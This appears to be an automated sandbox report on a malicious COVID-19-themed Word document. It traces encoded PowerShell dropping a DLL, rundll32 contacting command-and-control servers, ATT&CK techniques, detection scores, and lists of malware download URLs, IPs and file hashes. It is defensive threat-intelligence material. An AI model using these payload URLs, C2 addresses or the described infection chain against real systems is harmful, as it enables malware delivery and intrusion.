Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\powershell_ise.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\hh.exe VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeQueries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\rundll32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsWindows Management Instrumentation11Path InterceptionProcess Injection111Masquerading21OS Credential DumpingSecurity Software Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsCommand and Scripting Interpreter211Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsVirtualization/Sandbox Evasion2LSASS MemoryVirtualization/Sandbox Evasion2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer2Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsScripting22Logon Script (Windows)Logon Script (Windows)Disable or Modify Tools11Security Account ManagerProcess Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsExploitation for Client Execution3Logon Script (Mac)Logon Script (Mac)Process Injection111NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol14SIM Card SwapCarrier Billing Fraud
Cloud AccountsPowerShell4Network Logon ScriptNetwork Logon ScriptDeobfuscate/Decode Files or Information3LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
Replication Through Removable MediaLaunchdRc.commonRc.commonScripting22Cached Domain CredentialsSystem Information Discovery15VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
External Remote ServicesScheduled TaskStartup ItemsStartup ItemsHidden Files and Directories1DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobObfuscated Files or Information1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)Rundll321/etc/passwd and /etc/shadowSystem Network Connections DiscoverySoftware Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
Supply Chain CompromiseAppleScriptAt (Windows)At (Windows)File Deletion1Network SniffingProcess DiscoveryTaint Shared ContentLocal Data StagingExfiltration Over Unencrypted/Obfuscated Non-C2 ProtocolFile Transfer ProtocolsData Encrypted for Impact

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 338719 Sample: AG60273928I_COVID-19_SARS-C... Startdate: 12/01/2021 Architecture: WINDOWS Score: 100 50 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->50 52 Antivirus detection for URL or domain 2->52 54 Multi AV Scanner detection for submitted file 2->54 56 11 other signatures 2->56 11 cmd.exe 2->11         started        14 WINWORD.EXE 293 23 2->14         started        process3 signatures4 64 Suspicious powershell command line found 11->64 66 Very long command line found 11->66 68 Encrypted powershell cmdline option found 11->68 70 PowerShell case anomaly found 11->70 16 powershell.exe 12 9 11->16         started        21 msg.exe 11->21         started        process5 dnsIp6 40 mybusinessevent.com 185.2.4.29, 443, 49167, 49168 REGISTER_UK-ASGB Italy 16->40 42 shulovbaazar.com 51.79.161.36, 443, 49165, 49166 OVHFR Canada 16->42 44 2 other IPs or domains 16->44 38 C:\Users\user\Wdduy2m\Tmc1kuo\J70H.dll, PE32 16->38 dropped 58 Powershell drops PE file 16->58 23 rundll32.exe 16->23         started        file7 signatures8 process9 process10 25 rundll32.exe 2 23->25         started        signatures11 62 Hides that the sample has been downloaded from the Internet (zone.identifier) 25->62 28 rundll32.exe 1 25->28         started        process12 signatures13 72 Hides that the sample has been downloaded from the Internet (zone.identifier) 28->72 31 rundll32.exe 1 28->31         started        process14 signatures15 74 Hides that the sample has been downloaded from the Internet (zone.identifier) 31->74 34 rundll32.exe 9 31->34         started        process16 dnsIp17 46 71.72.196.159, 80 TWC-10796-MIDWESTUS United States 34->46 48 69.49.88.46, 49171, 80 MPW-MACHLINK-NETUS United States 34->48 60 System process connects to network (likely due to code injection or exploit) 34->60 signatures18

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
AG60273928I_COVID-19_SARS-CoV-2.doc27%VirustotalBrowse
AG60273928I_COVID-19_SARS-CoV-2.doc23%ReversingLabsDocument-Excel.Downloader.Heuristic

Dropped Files

SourceDetectionScannerLabelLink
C:\Users\user\Wdduy2m\Tmc1kuo\J70H.dll100%Joe Sandbox ML

Unpacked PE Files

SourceDetectionScannerLabelLinkDownload
10.2.rundll32.exe.1f0000.0.unpack100%AviraHEUR/AGEN.1110387Download File
7.2.rundll32.exe.210000.1.unpack100%AviraHEUR/AGEN.1110387Download File
7.2.rundll32.exe.1f0000.0.unpack100%AviraHEUR/AGEN.1110387Download File
9.2.rundll32.exe.1d0000.0.unpack100%AviraHEUR/AGEN.1110387Download File
8.2.rundll32.exe.1d0000.1.unpack100%AviraHEUR/AGEN.1110387Download File
9.2.rundll32.exe.1f0000.1.unpack100%AviraHEUR/AGEN.1110387Download File
10.2.rundll32.exe.210000.1.unpack100%AviraHEUR/AGEN.1110387Download File

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
https://thenetworker.ca/comment/8N4/0%Avira URL Cloudsafe
https://shulovbaazar.com0%Avira URL Cloudsafe
http://uhk.cncranes.com0%Avira URL Cloudsafe
http://ocsp.sectigo.com00%URL Reputationsafe
http://ocsp.sectigo.com00%URL Reputationsafe
http://ocsp.sectigo.com00%URL Reputationsafe
https://trayonlinegh.com/cgi-bin/HBPR/100%Avira URL Cloudmalware
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://mmo.martinpollock.co.uk/a/SQSGg/0%Avira URL Cloudsafe
https://mybusinessevent.comp0%Avira URL Cloudsafe
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
https://shulovbaazar.comp0%Avira URL Cloudsafe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#0%URL Reputationsafe
http://uhk.cncranes.com/ErrorPages/3/0%Avira URL Cloudsafe
https://mybusinessevent.com0%Avira URL Cloudsafe
https://sectigo.com/CPS0D0%URL Reputationsafe
https://sectigo.com/CPS0D0%URL Reputationsafe
https://sectigo.com/CPS0D0%URL Reputationsafe
http://69.49.88.46/kdd8h70lwp/lfu3p05/u2kanr3/0%Avira URL Cloudsafe
http://www.%s.comPA0%URL Reputationsafe
http://www.%s.comPA0%URL Reputationsafe
http://www.%s.comPA0%URL Reputationsafe
https://mybusinessevent.com/tiki-install/e/0%Avira URL Cloudsafe
https://capturetheaction.com.au/wp-includes/Yjp/100%Avira URL Cloudmalware
https://shulovbaazar.com/c/bcL6/100%Avira URL Cloudmalware

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
mybusinessevent.com
185.2.4.29
truetrue
    		unknown
    shulovbaazar.com
    		51.79.161.36
    		truetrue
      		unknown
      uhk.asiash.com
      		152.32.168.168
      		truefalse
        		unknown
        uhk.cncranes.com
        		unknown
        		unknowntrue
          		unknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          http://uhk.cncranes.com/ErrorPages/3/true
          • Avira URL Cloud: safe
          		unknown
          http://69.49.88.46/kdd8h70lwp/lfu3p05/u2kanr3/true
          • Avira URL Cloud: safe
          		unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://www.windows.com/pctv.rundll32.exe, 0000000A.00000002.2346359103.0000000001E10000.00000002.00000001.sdmpfalse
            		high
            https://thenetworker.ca/comment/8N4/powershell.exe, 00000005.00000002.2112345282.0000000003693000.00000004.00000001.sdmptrue
            • Avira URL Cloud: safe
            		unknown
            http://investor.msn.comrundll32.exe, 00000006.00000002.2119863752.0000000001AD0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110650517.0000000001E10000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2115150829.00000000020C0000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2346359103.0000000001E10000.00000002.00000001.sdmpfalse
              		high
              http://www.msnbc.com/news/ticker.txtrundll32.exe, 00000006.00000002.2119863752.0000000001AD0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110650517.0000000001E10000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2115150829.00000000020C0000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2346359103.0000000001E10000.00000002.00000001.sdmpfalse
                		high
                https://shulovbaazar.compowershell.exe, 00000005.00000002.2115162091.00000000039F1000.00000004.00000001.sdmptrue
                • Avira URL Cloud: safe
                		unknown
                http://uhk.cncranes.compowershell.exe, 00000005.00000002.2115200564.0000000003A42000.00000004.00000001.sdmptrue
                • Avira URL Cloud: safe
                		unknown
                http://ocsp.sectigo.com0powershell.exe, 00000005.00000002.2115200564.0000000003A42000.00000004.00000001.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                https://trayonlinegh.com/cgi-bin/HBPR/powershell.exe, 00000005.00000002.2112345282.0000000003693000.00000004.00000001.sdmptrue
                • Avira URL Cloud: malware
                		unknown
                http://www.litespeedtech.compowershell.exe, 00000005.00000002.2115162091.00000000039F1000.00000004.00000001.sdmpfalse
                  		high
                  http://windowsmedia.com/redir/services.asp?WMPFriendly=truerundll32.exe, 00000006.00000002.2120271741.0000000001CB7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2111002328.0000000001FF7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2117576675.00000000022A7000.00000002.00000001.sdmpfalse
                  • URL Reputation: safe
                  • URL Reputation: safe
                  • URL Reputation: safe
                  		unknown
                  http://www.hotmail.com/oerundll32.exe, 00000006.00000002.2119863752.0000000001AD0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110650517.0000000001E10000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2115150829.00000000020C0000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2346359103.0000000001E10000.00000002.00000001.sdmpfalse
                    		high
                    http://mmo.martinpollock.co.uk/a/SQSGg/powershell.exe, 00000005.00000002.2112345282.0000000003693000.00000004.00000001.sdmptrue
                    • Avira URL Cloud: safe
                    		unknown
                    http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkrundll32.exe, 00000006.00000002.2120271741.0000000001CB7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2111002328.0000000001FF7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2117576675.00000000022A7000.00000002.00000001.sdmpfalse
                      		high
                      https://mybusinessevent.comppowershell.exe, 00000005.00000002.2115174416.0000000003A04000.00000004.00000001.sdmpfalse
                      • Avira URL Cloud: safe
                      		unknown
                      http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0tpowershell.exe, 00000005.00000002.2115200564.0000000003A42000.00000004.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      http://www.icra.org/vocabulary/.rundll32.exe, 00000006.00000002.2120271741.0000000001CB7000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2111002328.0000000001FF7000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2117576675.00000000022A7000.00000002.00000001.sdmpfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      		unknown
                      http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.powershell.exe, 00000005.00000002.2107998363.00000000023F0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2114937163.00000000027A0000.00000002.00000001.sdmpfalse
                        		high
                        http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanervpowershell.exe, 00000005.00000002.2107269724.0000000000394000.00000004.00000020.sdmpfalse
                          		high
                          https://shulovbaazar.comppowershell.exe, 00000005.00000002.2115174416.0000000003A04000.00000004.00000001.sdmpfalse
                          • Avira URL Cloud: safe
                          		unknown
                          http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#powershell.exe, 00000005.00000002.2115200564.0000000003A42000.00000004.00000001.sdmpfalse
                          • URL Reputation: safe
                          • URL Reputation: safe
                          • URL Reputation: safe
                          		unknown
                          http://investor.msn.com/rundll32.exe, 00000006.00000002.2119863752.0000000001AD0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2110650517.0000000001E10000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2115150829.00000000020C0000.00000002.00000001.sdmp, rundll32.exe, 0000000A.00000002.2346359103.0000000001E10000.00000002.00000001.sdmpfalse
                            		high
                            https://mybusinessevent.compowershell.exe, 00000005.00000002.2115174416.0000000003A04000.00000004.00000001.sdmptrue
                            • Avira URL Cloud: safe
                            		unknown
                            https://sectigo.com/CPS0Dpowershell.exe, 00000005.00000002.2115200564.0000000003A42000.00000004.00000001.sdmpfalse
                            • URL Reputation: safe
                            • URL Reputation: safe
                            • URL Reputation: safe
                            		unknown
                            http://www.piriform.com/ccleanerpowershell.exe, 00000005.00000002.2107269724.0000000000394000.00000004.00000020.sdmpfalse
                              		high
                              http://www.%s.comPApowershell.exe, 00000005.00000002.2107998363.00000000023F0000.00000002.00000001.sdmp, rundll32.exe, 00000007.00000002.2114937163.00000000027A0000.00000002.00000001.sdmp, rundll32.exe, 00000008.00000002.2120077438.0000000002820000.00000002.00000001.sdmpfalse
                              • URL Reputation: safe
                              • URL Reputation: safe
                              • URL Reputation: safe
                              		low
                              https://mybusinessevent.com/tiki-install/e/powershell.exe, 00000005.00000002.2112345282.0000000003693000.00000004.00000001.sdmptrue
                              • Avira URL Cloud: safe
                              		unknown
                              https://capturetheaction.com.au/wp-includes/Yjp/powershell.exe, 00000005.00000002.2112345282.0000000003693000.00000004.00000001.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown
                              https://shulovbaazar.com/c/bcL6/powershell.exe, 00000005.00000002.2112345282.0000000003693000.00000004.00000001.sdmptrue
                              • Avira URL Cloud: malware
                              		unknown

                              Contacted IPs

                              • No. of IPs < 25%
                              • 25% < No. of IPs < 50%
                              • 50% < No. of IPs < 75%
                              • 75% < No. of IPs

                              Public

                              IPDomainCountryFlagASNASN NameMalicious
                              69.49.88.46
                              		unknownUnited States
                              		33734MPW-MACHLINK-NETUStrue
                              71.72.196.159
                              		unknownUnited States
                              		10796TWC-10796-MIDWESTUStrue
                              185.2.4.29
                              		unknownItaly
                              		203461REGISTER_UK-ASGBtrue
                              152.32.168.168
                              		unknownHong Kong
                              		135377UHGL-AS-APUCloudHKHoldingsGroupLimitedHKfalse
                              51.79.161.36
                              		unknownCanada
                              		16276OVHFRtrue

                              General Information

                              Joe Sandbox Version:31.0.0 Red Diamond
                              Analysis ID:338719
                              Start date:12.01.2021
                              Start time:19:15:07
                              Joe Sandbox Product:CloudBasic
                              Overall analysis duration:0h 7m 35s
                              Hypervisor based Inspection enabled:false
                              Report type:light
                              Sample file name:AG60273928I_COVID-19_SARS-CoV-2.doc
                              Cookbook file name:defaultwindowsofficecookbook.jbs
                              Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                              Number of analysed new started processes analysed:12
                              Number of new started drivers analysed:0
                              Number of existing processes analysed:0
                              Number of existing drivers analysed:0
                              Number of injected processes analysed:0
                              Technologies:
                              • HCA enabled
                              • EGA enabled
                              • HDC enabled
                              • GSI enabled (VBA)
                              • AMSI enabled
                              Analysis Mode:default
                              Analysis stop reason:Timeout
                              Detection:MAL
                              Classification:mal100.troj.evad.winDOC@16/7@3/5
                              EGA Information:Failed
                              HDC Information:
                              • Successful, ratio: 33.2% (good quality ratio 31.6%)
                              • Quality average: 71.6%
                              • Quality standard deviation: 24.9%
                              HCA Information:
                              • Successful, ratio: 62%
                              • Number of executed functions: 0
                              • Number of non-executed functions: 0
                              Cookbook Comments:
                              • Adjust boot time
                              • Enable AMSI
                              • Found application associated with file extension: .doc
                              • Found Word or Excel or PowerPoint or XPS Viewer
                              • Found warning dialog
                              • Click Ok
                              • Attach to Office via COM
                              • Scroll down
                              • Close Viewer
                              Warnings:
                              Show All
                              • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
                              • TCP Packets have been reduced to 100
                              • Report size getting too big, too many NtOpenKeyEx calls found.
                              • Report size getting too big, too many NtQueryAttributesFile calls found.
                              • Report size getting too big, too many NtQueryValueKey calls found.

                              Simulations

                              Behavior and APIs

                              TimeTypeDescription
                              19:15:40API Interceptor1x Sleep call for process: msg.exe modified
                              19:15:41API Interceptor79x Sleep call for process: powershell.exe modified
                              19:15:51API Interceptor794x Sleep call for process: rundll32.exe modified

                              Joe Sandbox View / Context

                              IPs

                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                              69.49.88.46FQ5754217297FF.docGet hashmaliciousBrowse
                              • 69.49.88.46/2hsmx8qypf/8iv55uq7hpxe/hf9tz7/
                              71.72.196.159FILE-092020.docGet hashmaliciousBrowse
                              • 71.72.196.159/Asgu9G/UPAJk1H/k1wB2h2IhMQGy9M4O/CwukNROTLhDmT5iz7yr/QNOGQRhP/
                              X5w6zls.exeGet hashmaliciousBrowse
                              • 71.72.196.159/YmBvqXK/A1bXsLoMSYg/i0gaWBtL9c/yD6C9feh/
                              #U5909#U531620.09.docGet hashmaliciousBrowse
                              • 71.72.196.159/HisuDo3My4/
                              #U5909#U531620-09.docGet hashmaliciousBrowse
                              • 71.72.196.159/IEHZ5/HVlPRDwFoj/OuQtgxrIROu80/9t0syM1s3J/
                              BCRYO2020.09.19.docGet hashmaliciousBrowse
                              • 71.72.196.159/UdroxO4ouHCZo3/SPUpyAXBlZAJ/kR4LZr6qJHOM3/9tr1e4XNde6jxg22B/j2TVTGpcHCpnic1/
                              drdgPfOU36.exeGet hashmaliciousBrowse
                              • 71.72.196.159/6YX6sQtKK6MLta/TbNsyU7EbVPMjL/0MoOi2xkKCNW7y67b/USvDoTSxSZ/BulSaK/
                              cC.exeGet hashmaliciousBrowse
                              • 71.72.196.159/LLRDDCScx1Byk2D/krMwjOaF56Uc9Il6eMD/WuP6hJZcQa4/5p5T7L/
                              #U304b#U3089#U306e#U5909#U66f419.docGet hashmaliciousBrowse
                              • 71.72.196.159/3oAMQ7MNt66lIE8EI/DizHtXLtgQHqx/U2NH3hw0GWPotmCV/dMZCjcyGRF/qUw6hgI/FwMSWVK67N4mSEoC/
                              LTB.docGet hashmaliciousBrowse
                              • 71.72.196.159/QxJ68bj/OcYZ8J9RWfz7qwepeY/7Zys/K1Bpu/5CRfSZCJqSBtKcz/dhIXBeS6vLJR/
                              #U6700#U65b0#U306e#U69cb#U9020#U56f3.docGet hashmaliciousBrowse
                              • 71.72.196.159/JMk30NNrO1ReTb/6XR5dMIuJFNZfcR/yg0fR2fj6mXvduKb/
                              HROF2020.docGet hashmaliciousBrowse
                              • 71.72.196.159/EMc53XBYQbN5Jl/
                              #U304b#U3089#U306e#U5909#U66f49#U6708.docGet hashmaliciousBrowse
                              • 71.72.196.159/1ieklOTBS/ak8HNcj/
                              DAT_2020_09_7444352632.docGet hashmaliciousBrowse
                              • 71.72.196.159/cv2mWGF5/67dqj/ZkWPeQbBjvdWajsuvx/lYL2/TljK64Me1bfzHxBI/
                              Dokumentation_FC_41232269.docGet hashmaliciousBrowse
                              • 71.72.196.159/ejSg6gT/pSnsS3gAqTGFHUm9V/Jg8Kv3cnCG2Miq94/Sf9xZ/
                              BIZ_18_09_2020_4070550449.docGet hashmaliciousBrowse
                              • 71.72.196.159/tiVhuDLoHxS/G2H7AH/
                              Betrag_2020_09_4036385628.docGet hashmaliciousBrowse
                              • 71.72.196.159/RQWehX/fgtv5/htJbK7vQCVUSRwZJeE/
                              SCNVS2020.09.docGet hashmaliciousBrowse
                              • 71.72.196.159/b9v6oT61Mzfa1oQAP/IIlXlIMvsnl/
                              ZZLEJDXT8LH-20200918.docGet hashmaliciousBrowse
                              • 71.72.196.159/v4zRqawC6/myK9u1BaFBM0ak/
                              #U5909#U531609_18.docGet hashmaliciousBrowse
                              • 71.72.196.159/w5aqN3cMRoz5Eq/
                              INF_18_09_2020.docGet hashmaliciousBrowse
                              • 71.72.196.159/5U1wQcRoWdLiEGx/gIcTfWkFIkHPs5yEqC/
                              185.2.4.29FQ5754217297FF.docGet hashmaliciousBrowse

                                Domains

                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                uhk.asiash.comFQ5754217297FF.docGet hashmaliciousBrowse
                                • 152.32.168.168
                                shulovbaazar.comFQ5754217297FF.docGet hashmaliciousBrowse
                                • 51.79.161.36
                                FQ5754217297FF.docGet hashmaliciousBrowse
                                • 51.79.161.36
                                mybusinessevent.comFQ5754217297FF.docGet hashmaliciousBrowse
                                • 185.2.4.29

                                ASN

                                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                TWC-10796-MIDWESTUSFQ5754217297FF.docGet hashmaliciousBrowse
                                • 71.72.196.159
                                invoice.docGet hashmaliciousBrowse
                                • 75.188.107.174
                                N3TmJXOg4P.dllGet hashmaliciousBrowse
                                • 75.188.107.174
                                59973067.docGet hashmaliciousBrowse
                                • 75.188.107.174
                                Electronic form.docGet hashmaliciousBrowse
                                • 75.188.107.174
                                2020_12- Statement.docGet hashmaliciousBrowse
                                • 75.188.107.174
                                http://foodlike.kz/templates/QUJOpdohWbgqcRtXl3uAR0twmMS59eLk1cnA6P2oA15NZcjPZPj0GO2DF/Get hashmaliciousBrowse
                                • 24.164.79.147
                                utox.exeGet hashmaliciousBrowse
                                • 174.99.153.50
                                New Doc 2020-12-21 09.53.07_8.docGet hashmaliciousBrowse
                                • 70.92.118.112
                                fdwv4hWF1M.exeGet hashmaliciousBrowse
                                • 72.133.174.230
                                Check.vbsGet hashmaliciousBrowse
                                • 69.76.61.62
                                RB1NsQ9LQf.exeGet hashmaliciousBrowse
                                • 71.79.68.222
                                42H3JnmK5y.exeGet hashmaliciousBrowse
                                • 98.103.204.12
                                7M5xbLL8eO.exeGet hashmaliciousBrowse
                                • 98.103.204.12
                                gQszb56YfO.exeGet hashmaliciousBrowse
                                • 71.72.196.159
                                d21iCa31cs.exeGet hashmaliciousBrowse
                                • 98.103.204.12
                                dXp0Z8K4ya.exeGet hashmaliciousBrowse
                                • 98.103.204.12
                                NL5ykZj9sR.exeGet hashmaliciousBrowse
                                • 98.103.204.12
                                vr2UB6w0Lu.exeGet hashmaliciousBrowse
                                • 98.103.204.12
                                SlG3qBWAzS.exeGet hashmaliciousBrowse
                                • 98.103.204.12
                                REGISTER_UK-ASGBFQ5754217297FF.docGet hashmaliciousBrowse
                                • 185.2.4.29
                                INV3867196801-20210111675616.xlsmGet hashmaliciousBrowse
                                • 185.2.4.104
                                rib.exeGet hashmaliciousBrowse
                                • 185.2.4.64
                                Electronic form.docGet hashmaliciousBrowse
                                • 185.2.4.71
                                https://pbi-ltd.co.uk/Get hashmaliciousBrowse
                                • 185.2.5.7
                                plusnew.exeGet hashmaliciousBrowse
                                • 185.2.4.64
                                file_445.docGet hashmaliciousBrowse
                                • 185.2.5.77
                                form.docGet hashmaliciousBrowse
                                • 185.2.4.18
                                form.docGet hashmaliciousBrowse
                                • 185.2.4.18
                                qN3LZUjj5E.docGet hashmaliciousBrowse
                                • 185.2.4.18
                                P4F2xu9OdH.docGet hashmaliciousBrowse
                                • 185.2.4.18
                                qN3LZUjj5E.docGet hashmaliciousBrowse
                                • 185.2.4.18
                                PWSD3M5Hzg.docGet hashmaliciousBrowse
                                • 185.2.4.18
                                P4F2xu9OdH.docGet hashmaliciousBrowse
                                • 185.2.4.18
                                PWSD3M5Hzg.docGet hashmaliciousBrowse
                                • 185.2.4.18
                                lsbTM2YnmA.docGet hashmaliciousBrowse
                                • 185.2.4.18
                                KjEgX012LU.docGet hashmaliciousBrowse
                                • 185.2.4.18
                                6DrX4a0jw1.docGet hashmaliciousBrowse
                                • 185.2.4.18
                                lsbTM2YnmA.docGet hashmaliciousBrowse
                                • 185.2.4.18
                                KjEgX012LU.docGet hashmaliciousBrowse
                                • 185.2.4.18
                                MPW-MACHLINK-NETUSFQ5754217297FF.docGet hashmaliciousBrowse
                                • 69.49.88.46
                                UHGL-AS-APUCloudHKHoldingsGroupLimitedHKFQ5754217297FF.docGet hashmaliciousBrowse
                                • 152.32.168.168
                                current productlist.exeGet hashmaliciousBrowse
                                • 103.218.243.57
                                REP380501 040121.docGet hashmaliciousBrowse
                                • 152.32.227.210
                                doc-20210104-0184.docGet hashmaliciousBrowse
                                • 152.32.227.210
                                7823099012021.docGet hashmaliciousBrowse
                                • 152.32.227.210
                                dhl.exeGet hashmaliciousBrowse
                                • 128.14.230.117
                                file.exeGet hashmaliciousBrowse
                                • 103.72.145.54
                                KeJ7Cl7flZ.exeGet hashmaliciousBrowse
                                • 101.36.107.74
                                Additional Agreement 2020-KYC.exeGet hashmaliciousBrowse
                                • 101.36.113.249
                                Additional Agreement 2020-KYC.exeGet hashmaliciousBrowse
                                • 101.36.113.249
                                DEWA PROJECT 12100317.exeGet hashmaliciousBrowse
                                • 101.36.113.249
                                NP9K0ul0jfgmTjl.exeGet hashmaliciousBrowse
                                • 101.36.120.233
                                Quotation.exeGet hashmaliciousBrowse
                                • 103.72.146.121
                                Detalii 032411-959286.docGet hashmaliciousBrowse
                                • 128.14.231.58
                                Detalii 032411-959286.docGet hashmaliciousBrowse
                                • 128.14.231.58
                                Detalii 032411-959286.docGet hashmaliciousBrowse
                                • 128.14.231.58
                                http://phpyb.com/gmhtg/TZ/2Q/zNzgLzGa.zipGet hashmaliciousBrowse
                                • 152.32.211.197

                                JA3 Fingerprints

                                No context

                                Dropped Files

                                No context

                                Created / dropped Files

                                C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{73127D7D-FA20-48C4-87C4-17800DB89026}.tmp
                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                File Type:data
                                Category:dropped
                                Size (bytes):1024
                                Entropy (8bit):0.05390218305374581
                                Encrypted:false
                                SSDEEP:3:ol3lYdn:4Wn
                                MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                Malicious:false
                                Reputation:high, very likely benign file
                                Preview: ........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\AG60273928I_COVID-19_SARS-CoV-2.LNK
                                Process:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Aug 26 14:08:14 2020, mtime=Wed Aug 26 14:08:14 2020, atime=Wed Jan 13 02:15:37 2021, length=162304, window=hide
                                Category:dropped
                                Size (bytes):2238
                                Entropy (8bit):4.5423169393715765
                                Encrypted:false
